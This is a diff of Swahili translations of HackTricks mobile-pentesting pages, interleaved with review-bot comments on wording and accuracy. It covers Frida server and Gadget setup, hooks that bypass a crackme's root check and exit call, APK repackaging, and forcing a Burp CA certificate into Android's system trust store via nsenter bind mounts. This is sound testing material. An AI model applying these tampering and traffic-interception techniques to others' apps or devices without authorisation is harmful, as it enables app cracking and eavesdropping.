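Review bot: headings are translated inconsistently within this hunk: L2484 '## ARM→x86 binary translation (Android 11+)' and L2490 '## Rooting a Play Store device' revert the previous Swahili headings (L2483, L2489) to English, while L2500, L2507, L2509 and L2513 translate theirs. Choose one policy per file. The blockquote added at L2488 ('> Kidokezo') is an improvement, since it matches the '> [!WARNING]' callout style used at L2406. The advice is sound: Google APIs x86_64 images allow `adb root`, Play images do not, and L2495 shows the exact adbd message the reader will see.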

View File

@ -1,9 +1,9 @@
# Mafunzo ya Frida
# Frida Mafunzo
{{#include ../../../banners/hacktricks-training.md}}
## Ufungaji
## Usakinishaji
Sakinisha **frida tools**:
```bash
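Review bot: the new title 'Frida Mafunzo' on L2521 inverts Swahili noun-phrase order; the previous 'Mafunzo ya Frida' (L2520) is the natural form and matches the '### [Mafunzo 1]' headings introduced later in the same file. 'Usakinishaji' for 'Installation' on L2524 is fine and consistent with 'Sakinisha' on L2525.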
@ -11,7 +11,7 @@ pip install frida-tools
pip install frida
```
**Pakua na sakinisha** kwenye Android **frida server** ([Download the latest release](https://github.com/frida/frida/releases)).\
Mstari mmoja wa kuanzisha adb tena kwa root mode, kujiunga nayo, kupakia frida-server, kumpa ruhusa za utekelezaji na kuiendesha kwa background:
Mstari mmoja wa amri ili kuwasha upya adb katika root mode, kuungana nayo, kupakia frida-server, kumpa exec permissions na kuikimbiza kwenye background:
```bash
adb root; adb connect localhost:6000; sleep 1; adb push frida-server /data/local/tmp/; adb shell "chmod 755 /data/local/tmp/frida-server"; adb shell "/data/local/tmp/frida-server &"
```
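Review bot: the one-liner on L2534 is unchanged, but the rewritten sentence on L2532 should state its assumptions: `adb connect localhost:6000` only makes sense when the device exposes ADB over TCP on port 6000 (an emulator or a USB-attached device is already connected and this call just errors out), and `adb push frida-server` assumes the release binary from L2530 has been renamed from its versioned file name to `frida-server` and matches the device ABI. Also, `adb shell "/data/local/tmp/frida-server &"` can leave the daemon tied to the shell session; `adb shell "nohup /data/local/tmp/frida-server >/dev/null 2>&1 &"` is more robust. On wording, 'kuikimbiza' (L2532) means to chase away; 'kuiendesha' (L2531) is the right verb for running a process.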
@ -22,10 +22,10 @@ frida-ps -U | grep -i <part_of_the_package_name> #Get all the package name
```
## Frida server vs. Gadget (root vs. no-root)
Njia mbili za kawaida za ku-instrument programu za Android kwa kutumia Frida:
Njia mbili za kawaida za ku-instrument apps za Android kwa kutumia Frida:
- Frida server (rooted devices): Tuma na endesha daemon asilia inayokuruhusu kuambatisha kwenye mchakato wowote.
- Frida Gadget (no root): Weka Frida kama shared library ndani ya APK na ipakie kiotomatiki ndani ya mchakato lengwa.
- Frida server (rooted devices): Pusha na endesha daemon ya native inayokuwezesha kuungana na mchakato wowote.
- Frida Gadget (no root): Weka Frida kama shared library ndani ya APK na ui-pakie kiotomatiki ndani ya mchakato lengwa.
Frida server (rooted)
```bash
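Review bot: 'ui-pakie kiotomatiki' on L2544 (load it automatically) overstates what the Gadget does; the library is only loaded because the app loads it, which is exactly why step 2 later in this file adds a `System.loadLibrary("frida-gadget")` stub. Suggest 'ipakiwe na app yenyewe' or similar. Also 'Pusha' on L2543 is an anglicism where the previous 'Tuma' (L2541) reads better, and the 'Frida server (rooted)' label on L2545 is left untranslated.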
@ -42,9 +42,9 @@ frida -U -n com.example.app
```
Frida Gadget (no-root)
1) Tenganisha APK, ongeza gadget .so na config:
- Weka libfrida-gadget.so ndani ya lib/<abi>/ (kwa mfano, lib/arm64-v8a/)
- Unda assets/frida-gadget.config na mipangilio yako ya upakiaji wa script
1) Fungua APK, ongeza gadget .so na config:
- Weka libfrida-gadget.so ndani ya lib/<abi>/ (e.g., lib/arm64-v8a/)
- Unda assets/frida-gadget.config na mipangilio ya upakiaji ya script yako
Mfano wa frida-gadget.config
```json
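Review bot: step 1 places the config at `assets/frida-gadget.config` (L2552/L2555), but on Android the Gadget looks for its config next to the shared library under the same basename with a `.so` suffix, i.e. `lib/<abi>/libfrida-gadget.config.so`, because only `.so` files get extracted alongside the gadget; a file under `assets/` is never read. Please fix the path in the new text (the Frida Gadget documentation linked in this file's References describes the naming). Minor: 'Tenganisha' (L2550) means to separate; 'Fungua' (L2553) is the better verb for unpacking the APK.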
@ -53,10 +53,10 @@ Mfano wa frida-gadget.config
"runtime": { "logFile": "/sdcard/frida-gadget.log" }
}
```
2) Taja/pakia gadget ili ianzishwe mapema:
- Rahisi zaidi: Ongeza stub ndogo ya Java kwa System.loadLibrary("frida-gadget") katika Application.onCreate(), au tumia upakiaji wa maktaba za native uliopo tayari.
2) Rejea/pakia gadget ili ianzishwe mapema:
- Rahisi zaidi: Ongeza stub ndogo ya Java kwa System.loadLibrary("frida-gadget") katika Application.onCreate(), au tumia kupakia maktaba ya native iliyopo.
3) Repack na saini APK, kisha sakinisha:
3) Rudisha kifurushi na kusaini APK, kisha sakinisha:
```bash
apktool d app.apk -o app_m
# ... add gadget .so and config ...
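Review bot: 'Rudisha kifurushi na kusaini APK' on L2567 mistranslates 'Repack and sign' as 'return the package and sign'; use 'Fungasha upya na usaini APK' (the previous L2566 kept the English 'Repack', which was at least unambiguous). Also check the config sample at L2559: in the Gadget configuration format `runtime` is a string selecting the JS runtime (`default`, `qjs`, `v8`), not an object, so `"runtime": { "logFile": ... }` as shown will not be honoured; verify the key against the Frida Gadget docs before shipping it.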
@ -64,42 +64,42 @@ apktool b app_m -o app_gadget.apk
uber-apk-signer -a app_gadget.apk -o out_signed
adb install -r out_signed/app_gadget-aligned-debugSigned.apk
```
4) Unganisha kutoka host hadi gadget process:
4) Unganisha kutoka host kwenye mchakato wa gadget:
```bash
frida-ps -Uai
frida -U -n com.example.app
```
Vidokezo
- Gadget inatambuliwa na baadhi ya kinga; tunza majina/paths kwa utulivu na zipakwe mwishoni/kwa masharti ikiwa inahitajika.
- Kwa apps zilizo hardened, pendelea rooted testing na server + late attach, au unganisha na Magisk/Zygisk hiding.
Notes
- Gadget inatambuliwa na baadhi ya hatua za ulinzi; hifadhi names/paths kwa utulivu na ziweke kuchelewa/tu kwa masharti ikiwa inahitajika.
- Kwa hardened apps, pendelea testing ya rooted ikitumia server + late attach, au ichanganye na kujificha kwa Magisk/Zygisk hiding.
## Mafunzo
### [Mafunzo 1](frida-tutorial-1.md)
**From**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\
**Chanzo**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\
**APK**: [https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)\
**Source Code**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo)
**Msimbo wa Chanzo**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo)
**Fuata [kiungo ili kusoma](frida-tutorial-1.md).**
**Soma kupitia [kiungo](frida-tutorial-1.md).**
### [Tutorial 2](frida-tutorial-2.md)
### [Mafunzo 2](frida-tutorial-2.md)
**From**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Parts 2, 3 & 4)\
**APKs and Source code**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples)
**Chanzo**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Sehemu 2, 3 & 4)\
**APKs na msimbo wa chanzo**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples)
**Fuata [kiungo ili kusoma.](frida-tutorial-2.md)**
**Soma kupitia [kiungo](frida-tutorial-2.md).**
### [Tutorial 3](owaspuncrackable-1.md)
### [Mafunzo 3](owaspuncrackable-1.md)
**From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
**Chanzo**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
**APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk)
**Fuata [kiungo ili kusoma](owaspuncrackable-1.md).**
**Soma kupitia [kiungo](owaspuncrackable-1.md).**
**You can find more Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)
**Unaweza kupata skripti zaidi za Awesome Frida hapa:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)
## Quick Examples
## Mifano ya Haraka
### Kuitisha Frida kutoka command line
```bash
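Review bot: 'kujificha kwa Magisk/Zygisk hiding' on L2586 says 'hiding' twice (once in Swahili, once in English); drop the trailing 'hiding'. 'From' is rendered as 'Chanzo' (source) on L2590/L2600/L2607, which collides with 'Msimbo wa Chanzo' (source code) on L2593; 'Kutoka' keeps the two distinct. The 'Notes' label on L2584 reverts the previous 'Vidokezo' (L2581) to English. The install line `adb install -r out_signed/app_gadget-aligned-debugSigned.apk` (L2573) matches uber-apk-signer's default output naming and needs no change.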
@ -125,9 +125,9 @@ print('[ * ] Running Frida Demo application')
script.load()
sys.stdin.read()
```
### Hooking functions without parameters
### Hooking functions bila vigezo
Hook the function `a()` ya class `sg.vantagepoint.a.c`
Hook kazi `a()` ya darasa `sg.vantagepoint.a.c`
```javascript
Java.perform(function () {
; rootcheck1.a.overload().implementation = function() {
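Review bot: the heading on L2622 keeps 'Hooking functions' in English and translates only 'without parameters' ('bila vigezo'), while L2624 translates 'function' as 'kazi' and, later in the file, L2642 leaves 'parameters' in English; settle on one rendering of 'function' and 'parameter' for the whole file. The snippet at L2627 begins with a stray `;` before `rootcheck1.a.overload()`, a pre-existing artifact worth removing while these lines are touched.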
@ -144,7 +144,7 @@ sysexit.exit.overload("int").implementation = function (var_0) {
send("java.lang.System.exit(I)V // We avoid exiting the application :)")
}
```
Hook MainActivity `.onStart()` na `.onCreate()`
Hook MainActivity `.onStart()` & `.onCreate()`
```javascript
var mainactivity = Java.use("sg.vantagepoint.uncrackable1.MainActivity")
mainactivity.onStart.overload().implementation = function () {
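Review bot: the only change in this hunk, L2632 to L2633, replaces the Swahili conjunction 'na' with '&' in running prose ('.onStart() & .onCreate()'), which reads worse than the original; keep 'na'. The `sysexit.exit` replacement above it (L2628 to L2630) intentionally never calls the original implementation, which is the point of the example and should be left as is.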
@ -168,9 +168,9 @@ send("Activity HIT!!!")
var ret = this.onCreate.overload("android.os.Bundle").call(this, var_0)
}
```
### Hooking functions na vigezo na kupata thamani
### Hooking functions zenye parameters na kupata thamani
Hooking function ya decryption. Chapisha ingizo, ita function ya asili ili ku-decrypt ingizo na hatimaye, chapisha data ya wazi:
Hooking decryption function. Chapisha input, itisha original function ili decrypt input, na hatimaye chapisha data wazi:
```javascript
function getString(data) {
var ret = ""
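Review bot: L2644 is a regression from L2643: 'Hooking decryption function. Chapisha input, itisha original function ili decrypt input, na hatimaye chapisha data wazi' mixes several English words into a Swahili sentence where the previous version was fully Swahili ('Chapisha ingizo, ita function ya asili ili ku-decrypt ingizo ... data ya wazi'). Restore the earlier wording, or at least 'ingizo' for input and 'function ya asili' for the original function. The same applies to the heading on L2642 ('functions zenye parameters').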
@ -195,9 +195,9 @@ send("Decrypted flag: " + flag)
return ret //[B
}
```
### Hooking functions na kuwaita na pembejeo zetu
### Hooking functions na kuziita kwa pembejeo zetu
Hook function inayopokea string na uite kwa string tofauti (kutoka [here](https://11x256.github.io/Frida-hooking-android-part-2/))
Hook function inayopokea string na uiite na string nyingine (kutoka [here](https://11x256.github.io/Frida-hooking-android-part-2/))
```javascript
var string_class = Java.use("java.lang.String") // get a JS wrapper for java's String class
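Review bot: both the old and new sentence (L2654/L2655) leave the link text 'here' untranslated ('kutoka [here](...)'); 'hapa' is the obvious rendering. The new phrasing 'uiite na string nyingine' (L2655) is fine, and the `Java.use("java.lang.String")` line at L2657 is unchanged context.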
@ -210,11 +210,11 @@ console.log("Return value: " + ret)
return ret
}
```
### Kupata object iliyoundwa tayari ya darasa
### Getting an already created object of a class
Ikiwa unataka kutoa sifa fulani ya object iliyoundwa unaweza kutumia hii.
Ikiwa unataka kuchota sifa fulani ya object iliyoundwa unaweza kutumia hii.
Katika mfano huu utaona jinsi ya kupata object ya darasa my_activity na jinsi ya kuita function .secret() ambayo itachapisha sifa binafsi ya object:
Katika mfano huu utaona jinsi ya kupata object ya darasa my_activity na jinsi ya kuita function .secret() ambayo itachapisha sifa ya kibinafsi ya object:
```javascript
Java.choose("com.example.a11x256.frida_test.my_activity", {
onMatch: function (instance) {
@ -231,7 +231,7 @@ onComplete: function () {},
- [Part 1 of Advanced Frida Usage blog series: IOS Encryption Libraries](https://8ksec.io/advanced-frida-usage-part-1-ios-encryption-libraries-8ksec-blogs/)
## Marejeleo
## Marejeo
- [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools)
- [Frida Gadget documentation](https://frida.re/docs/gadget/)
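Review bot: L2663 reverts the heading '### Kupata object iliyoundwa tayari ya darasa' (L2662) to English ('Getting an already created object of a class'), the opposite direction from the rest of this commit; keep the Swahili heading. 'Kuchota' on L2665 is a good replacement for 'kutoa'. The `Java.choose(...)` snippet at L2669/L2670 is unchanged and is the right call for enumerating live instances of a class.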

View File

@ -13,16 +13,16 @@ adb shell settings put global http_proxy 192.168.1.2:8080
# Clear proxy
adb shell settings put global http_proxy :0
```
Kidokezo: Katika Burp, elekeza listener yako kwa 0.0.0.0 ili vifaa kwenye LAN viweze kuungana (Proxy -> Options -> Proxy Listeners).
Vidokezo: Katika Burp, weka listener yako kwenye 0.0.0.0 ili vifaa kwenye LAN viweze kuungana (Proxy -> Options -> Proxy Listeners).
## Kwenye Mashine ya Virtuali
## Kwenye Mashine Pepe
Kwanza kabisa unahitaji kupakua cheti la Der kutoka Burp. Unaweza kufanya hivyo katika _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_
Kwanza kabisa unahitaji kupakua cheti cha Der kutoka Burp. Unaweza kufanya hivyo katika _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_
![](<../../images/image (367).png>)
**Hamisha cheti kwa muundo wa Der** na kisha **tubadilishe** hadi iwe katika fomu ambayo **Android** itaweza **kuelewa.** Kumbuka kwamba **ili kusanidi cheti cha burp kwenye mashine ya Android katika AVD** unahitaji **kuendesha** mashine hii **kwa** chaguo **`-writable-system`**.\
Kwa mfano unaweza kuiendesha hivi:
**Hamisha cheti kwa muundo wa Der** na tu**ibadilishe** kuwa fomu ambayo **Android** itaweza **kuelewa.** Kumbuka kwamba **ili kusanidi cheti cha burp kwenye mashine ya Android katika AVD** unahitaji **kuendesha** mashine hii **kwa** chaguo **`-writable-system`**.\
Kwa mfano unaweza kuiendesha kama:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -http-proxy 192.168.1.12:8080 -writable-system
```
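Review bot: the tip at L2684/L2685 tells the reader to bind the Burp listener to 0.0.0.0; that exposes an unauthenticated intercepting proxy to every host on the LAN, so the text should advise binding to the lab interface address (the `192.168.1.2` already used in the `adb shell settings put global http_proxy` example) or firewalling the port. On wording, 'Vidokezo' (plural) on L2685 replaces 'Kidokezo' for a single tip, and the bold markup on L2693 is broken mid-word ('tu**ibadilishe**' versus '**tubadilishe**' on L2691).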
@ -37,27 +37,27 @@ adb shell mv /sdcard/$CERTHASHNAME /system/etc/security/cacerts/ #Move to correc
adb shell chmod 644 /system/etc/security/cacerts/$CERTHASHNAME #Assign privileges
adb reboot #Now, reboot the machine
```
Mara tu **mashine imekamilisha kuanzisha upya**, cheti cha Burp kitakuwa kinatumika na mfumo!
Mara tu **mashine itakapomaliza kuanzisha upya** cheti cha Burp kitakuwa kinatumika!
## Kutumia Magisc
Ikiwa **ulikata root kifaa chako kwa Magisc** (labda emulator), na **huwezi kufuata** **hatua** zilizotangulia kusanidi Burp cert kwa sababu **filesystem ni read-only** na huwezi kuiremonta kuwa writable, kuna njia nyingine.
Ikiwa ume **rooted kifaa chako kwa Magisc** (labda emulator), na **huwezi kufuata** **hatua** zilizotangulia za kusanidua Burp cert kwa sababu **filesystem ni read-only** na huwezi kuiremount ili iwe writable, kuna njia nyingine.
Iliyefafanuliwa katika [**this video**](https://www.youtube.com/watch?v=qQicUW0svB8) unahitaji:
Imeelezewa katika [**video hii**](https://www.youtube.com/watch?v=qQicUW0svB8) unahitaji:
1. **Install a CA certificate**: Just **drag&drop** the DER Burp certificate **changing the extension** to `.crt` in the mobile so it's stored in the Downloads folder and go to `Install a certificate` -> `CA certificate`
1. **Install a CA certificate**: Ingiza tu kwa **drag&drop** cheti cha DER cha Burp ukibadilisha extension hadi `.crt` kwenye simu ili kihifadhiwe kwenye folda ya Downloads na uende `Install a certificate` -> `CA certificate`
<figure><img src="../../images/image (53).png" alt="" width="164"><figcaption></figcaption></figure>
- Angalia cheti kilihifadhiwa vizuri kwa kwenda `Trusted credentials` -> `USER`
- Hakikisha kuwa cheti kimehifadhiwa kwa usahihi kwa kwenda `Trusted credentials` -> `USER`
<figure><img src="../../images/image (54).png" alt="" width="334"><figcaption></figcaption></figure>
2. **Make it System trusted**: Download the Magisc module [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (a .zip file), **drag&drop it** in the phone, go to the **Magics app** in the phone to the **`Modules`** section, click on **`Install from storage`**, select the `.zip` module and once installed **reboot** the phone:
2. **Make it System trusted**: Pakua module ya Magisc [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (ni faili .zip), **drag&drop** kwenye simu, nenda kwenye app ya **Magics** kwenye simu kwa sehemu ya **`Modules`**, bonyeza **`Install from storage`**, chagua module ya `.zip` na mara imewekwa **reboot** simu:
<figure><img src="../../images/image (55).png" alt="" width="345"><figcaption></figcaption></figure>
- Baada ya kuanzisha upya, nenda `Trusted credentials` -> `SYSTEM` na uhakikishe Postswigger cert iko hapo
- Baada ya ku-reboot, nenda `Trusted credentials` -> `SYSTEM` na hakikisha cheti cha Postswigger kipo hapo
<figure><img src="../../images/image (56).png" alt="" width="314"><figcaption></figcaption></figure>
@ -67,13 +67,13 @@ Angalia [https://medium.com/@justmobilesec/magisk-for-mobile-pentesting-rooting-
## Baada ya Android 14
Katika toleo la hivi karibuni la Android 14, kumetokea mabadiliko makubwa katika jinsi Certificate Authority (CA) certificates zinazothibitishwa na mfumo zinavyoshughulikiwa. Hapo awali, cheti hizi zilihifadhiwa katika **`/system/etc/security/cacerts/`**, zikipatikana na zinabadilika kwa watumiaji wenye root, na hivyo kutumika mara moja kote kwenye mfumo. Hata hivyo, na Android 14, eneo la uhifadhi limehamishwa kwenda **`/apex/com.android.conscrypt/cacerts`**, saraka ndani ya `\`/apex\``, ambayo ni immutable kwa asili.
Katika toleo jipya la Android 14, kumetokea mabadiliko makubwa katika jinsi Certificate Authority (CA) certificates zinazoaminika na mfumo zinavyoshughulikiwa. Hadi sasa, vyote vilihifadhiwa katika **`/system/etc/security/cacerts/`**, ambavyo vilikuwa vinapatikana na kuweza kubadilishwa na watumiaji walio na root privileges, jambo ambalo liliwezesha mabadiliko kutumika mara moja kwenye mfumo mzima. Hata hivyo, kwa Android 14, mahali pa kuhifadhi yamehamishwa hadi **`/apex/com.android.conscrypt/cacerts`**, saraka ndani ya **`/apex`**, ambayo kwa asili ni immutable.
Jaribio la kuremonta APEX cacerts path kuwa writable yatashindwa, kwani mfumo hautaruhusu operesheni hizo. Hata jaribio la kuunmount au ku-overlay saraka kwa tmpfs halitachukua muda; programu zitabaki kutumia data za cheti asilia licha ya mabadiliko kwenye ngazi ya filesystem. Ustahimilivu huu unatokana na mount ya **`/apex`** kuwa na PRIVATE propagation, kuhakikisha kwamba mabadiliko ndani ya saraka ya **`/apex`** hayagusi michakato mingine.
Jaribio la ku-remount APEX cacerts path ili liwe writable hutumbukia kushindwa, kwa sababu mfumo haukuruhusu operesheni kama hiyo. Hata jaribio la ku-unmount au ku-overlay saraka hiyo kwa filesystem ya muda (tmpfs) halitatenga hali ya immutable; applications zinaendelea kufikia data ya cheti ya awali bila kujali mabadiliko kwenye ngazi ya filesystem. Ustahimilivu huu unatokana na mount ya **`/apex`** kuwa imesanifiwa na PRIVATE propagation, ikihakikisha kwamba mabadiliko yoyote ndani ya saraka ya **`/apex`** hayathiri michakato mingine.
Uanzishaji wa Android unahusisha mchakato wa `init`, ambao, anapoanza mfumo wa uendeshaji, pia huanzisha mchakato wa Zygote. Mchakato huu unawajibika kuwasha michakato ya programu ndani ya mount namespace mpya inayojumuisha mount ya kibinafsi ya **`/apex`**, hivyo kutenganisha mabadiliko ya saraka hii kutoka kwa michakato mingine.
Uanzishaji wa Android unahusisha mchakato wa `init`, ambao, anapoanzisha operating system, pia huanzisha mchakato wa Zygote. Mchakato huu unawajibika kwa kuzindua michakato ya application yenye mount namespace mpya inayojumuisha mount ya kibinafsi ya **`/apex`**, hivyo kutenga mabadiliko ya saraka hii kutoka kwa michakato mingine.
Hata hivyo, kuna njia mbadala kwa wale wanaohitaji kubadilisha CA certificates zinazothibitishwa na mfumo ndani ya saraka ya **`/apex`**. Hii inahusisha kuremonta kwa mkono **`/apex`** ili kuondoa PRIVATE propagation, hivyo kuifanya iwe writable. Mchakato unajumuisha kunakili yaliyomo ya **`/apex/com.android.conscrypt`** mahali pengine, kuunmount saraka ya **`/apex/com.android.conscrypt`** ili kuondoa ukandamizaji wa read-only, na kisha kurejesha yaliyomo kwenye eneo lao la asili ndani ya **`/apex`**. Njia hii inahitaji hatua ya haraka ili kuepuka kukatika kwa mfumo. Ili kuhakikisha mabadiliko haya yanatumika kwenye mfumo mzima, inapendekezwa kuanzisha upya `system_server`, ambayo kwa ufanisi inaanzisha tena programu zote na kuleta mfumo katika hali thabiti.
Hata hivyo, kuna njia mbadala kwa wale wanaohitaji kubadilisha CA certificates zinazoaminika na mfumo ndani ya saraka ya **`/apex`**. Hii inahusisha ku-remount kwa mkono **`/apex`** ili kuondoa PRIVATE propagation, na hivyo kuifanya iwe writable. Mchakato huo unajumuisha kunakili yaliyomo ya **`/apex/com.android.conscrypt`** hadi sehemu nyingine, ku-unmount saraka ya **`/apex/com.android.conscrypt`** ili kuondoa kikomo cha read-only, na kisha kurejesha yaliyomo kwenye mahali pake asilia ndani ya **`/apex`**. Njia hii inahitaji hatua za haraka ili kuepuka crash za mfumo. Ili kuhakikisha mabadiliko haya yanatumika kwenye mfumo mzima, inashauriwa kuwasha upya `system_server`, ambayo kwa ufanisi inarestart applications zote na kuleta mfumo katika hali thabiti.
```bash
# Create a separate temp directory, to hold the current certificates
# Otherwise, when we add the mount we can't read the current certs anymore.
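Review bot: the retranslated lines carry over pre-existing misspellings that should be fixed while they are being touched: 'Magisc' (L2706) and 'Magics app' (L2716) for Magisk, and 'Postswigger' (L2719) for PortSwigger; the heading '## Kutumia Magisc' (L2704) has the same typo. Otherwise the new text is an improvement: L2724 repairs the escaped backticks around `/apex` that L2723 had, and 'haukuruhusu' on L2726 should be 'hauruhusu'.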
@ -131,26 +131,26 @@ wait # Launched in parallel - wait for completion here
echo "System certificate injected"
```
### Bind-mounting through NSEnter
### Bind-mounting kupitia NSEnter
1. **Kuweka saraka inayoweza kuandikwa**: Awali, saraka inayoweza kuandikwa inaanzishwa kwa ku-mount `tmpfs` juu ya saraka ya vyeti ya mfumo non-APEX iliyopo. Hii inafikiwa kwa amri ifuatayo:
1. **Kusanidi Saraka Inayoweza Kuandikwa**: Awali, saraka inayoweza kuandikwa inaundwa kwa mounting ya `tmpfs` juu ya saraka ya vyeti ya mfumo ya non-APEX iliyopo. Hii inafikiwa kwa amri ifuatayo:
```bash
mount -t tmpfs tmpfs /system/etc/security/cacerts
```
2. **Kuandaa Vyeti vya CA**: Baada ya kuweka saraka inayoweza kuandikwa, vyeti vya CA ambavyo mtu anakusudia kutumia vinapaswa kunakiliwa katika saraka hii. Hii inaweza kuhusisha kunakili vyeti za default kutoka `/apex/com.android.conscrypt/cacerts/`. Ni muhimu kurekebisha ruhusa na lebo za SELinux za vyeti hivi ipasavyo.
3. **Bind Mounting for Zygote**: Kwa kutumia nsenter, mtu anaingia katika mount namespace ya Zygote. Zygote, kama mchakato unaehusika na kuanzisha programu za Android, anahitaji hatua hii ili kuhakikisha kwamba programu zote zinazozinduliwa kuanzia sasa zitumie vyeti vya CA vilivyosanidiwa upya. Amri inayotumika ni:
2. **Kutayarisha Vyeti vya CA**: Baada ya kuandaa directory inayoweza kuandikwa, vyeti vya CA ambavyo mtu anataka kutumia vinapaswa kunakiliwa ndani ya directory hii. Hii inaweza kuhusisha kunakili vyeti vya default kutoka `/apex/com.android.conscrypt/cacerts/`. Ni muhimu kurekebisha ruhusa na lebo za SELinux za vyeti hivi ipasavyo.
3. **Bind Mounting for Zygote**: Kwa kutumia `nsenter`, mtu anaingia kwenye mount namespace ya Zygote. Zygote, ikiwa ni mchakato unaehusika na kuanzisha programu za Android, inahitaji hatua hii ili kuhakikisha kwamba programu zote zitakazoanzishwa baadaye zinatumia vyeti vya CA vilivyosanidiwa hivi sasa. Amri inayotumika ni:
```bash
nsenter --mount=/proc/$ZYGOTE_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts
```
Hii inahakikisha kwamba kila app mpya itakayozinduliwa itazingatia usanidi wa CA certificates uliosasishwa.
Hii inahakikisha kwamba kila app mpya itakayozinduliwa itafuata usanidi uliosasishwa wa vyeti vya CA.
4. **Kutekeleza Mabadiliko kwa Programu Zinazoendeshwa**: Ili kutekeleza mabadiliko kwa programu ambazo tayari zinaendeshwa, `nsenter` hutumika tena kuingia katika namespace ya kila app kibinafsi na kufanya bind mount sawa. Amri inayohitajika ni:
4. **Kutekeleza Mabadiliko kwa Programu Zinazoendesha**: Ili kutekeleza mabadiliko kwa programu ambazo tayari zinaendeshwa, `nsenter` inatumiwa tena kuingia kwenye namespace ya kila app mmoja mmoja na kufanya bind mount sawa. Amri inayohitajika ni:
```bash
nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts
```
5. **Alternative Approach - Soft Reboot**: Njia mbadala inahusisha kufanya bind mount kwenye mchakato wa `init` (PID 1) ikifuatiwa na soft reboot ya mfumo wa uendeshaji kwa amri za `stop && start`. Njia hii itasambaza mabadiliko katika namespaces zote, ikiepuka haja ya kushughulikia kila app inayokimbia kimoja kwa kimoja. Hata hivyo, njia hii kwa ujumla haipendekeziwi kutokana na usumbufu wa kufanya reboot.
5. **Njia Mbadala - Soft Reboot**: Njia mbadala inahusisha kufanya bind mount kwenye `init` process (PID 1) ikifuatiwa na soft reboot ya mfumo wa uendeshaji kwa amri za `stop && start`. Njia hii itaeneza mabadiliko kwa namespaces zote, ikiepuka hitaji la kushughulikia kila app kimoja kimoja. Hata hivyo, njia hii kwa ujumla haipendekezwi kwa sababu ya usumbufu wa rebooting.
## Marejeo
## Marejeleo
- [Android 14: Install a system CA certificate on a rooted device](https://httptoolkit.com/blog/android-14-install-system-ca-certificate/)
- [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools)

View File

@ -4,43 +4,43 @@
## **Port 139**
_**Network Basic Input Output System**_** (NetBIOS)** ni itifaki ya programu iliyoundwa kuwezesha programu, PCs, na desktops ndani ya local area network (LAN) kuingiliana na vifaa vya mtandao na **kuwezesha usafirishaji wa data kwenye mtandao**. Utambuzi na eneo la programu zinazofanya kazi kwenye mtandao wa NetBIOS hufikiwa kupitia majina yao ya NetBIOS, ambayo yanaweza kuwa na herufi hadi 16 kwa urefu na mara nyingi yanatofautiana na jina la kompyuta. Kikao cha NetBIOS kati ya programu mbili kinaanzishwa wakati programu moja (acting as the client) inatoa amri ya "call" kwa programu nyingine (acting as the server) ikitumia **TCP Port 139**.
The _**Network Basic Input Output System**_** (NetBIOS)** ni itifaki ya programu iliyoundwa kuwezesha programu, PCs, na Desktops ndani ya mtandao wa eneo la ndani (LAN) kuingiliana na vifaa vya mtandao na **kusaidia usafirishaji wa data kwenye mtandao**. Utambuzi na eneo la programu zinazofanya kazi katika mtandao wa NetBIOS hufikiwa kupitia majina yao ya NetBIOS, ambayo yanaweza kuwa hadi herufi 16 kwa urefu na mara nyingi yanatofautiana na jina la kompyuta. Kikao cha NetBIOS kati ya programu mbili kinaanzishwa wakati programu moja (inayofanya kazi kama mteja) inatoa amri ya "kuita" programu nyingine (inayofanya kazi kama seva) kwa kutumia **TCP Port 139**.
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
## Port 445
Kiufundi, Port 139 inatajwa kama NBT over IP, wakati Port 445 inatambulika kama SMB over IP. Akronimu **SMB** inamaanisha **Server Message Blocks**, ambayo pia kwa sasa inajulikana kama **Common Internet File System (CIFS)**. Kwa kuwa ni protocol ya application-layer ya mtandao, SMB/CIFS hutumika hasa kuwezesha ufikiaji wa pamoja wa faili, vichapishi, bandari za serial, na kurahisisha aina mbalimbali za mawasiliano kati ya nodi kwenye mtandao.
Kiufundi, Port 139 inarejelewa kama NBT over IP, huku Port 445 ikitambulika kama SMB over IP. Kifupi **SMB** kinamaanisha **Server Message Blocks**, ambayo pia kisasa inajulikana kama **Common Internet File System (CIFS)**. Kama itifaki ya mtandao katika safu ya programu, SMB/CIFS hutumiwa hasa kuwezesha upatikanaji wa pamoja wa faili, printa, bandari za serial, na kurahisisha aina mbalimbali za mawasiliano kati ya nodes kwenye mtandao.
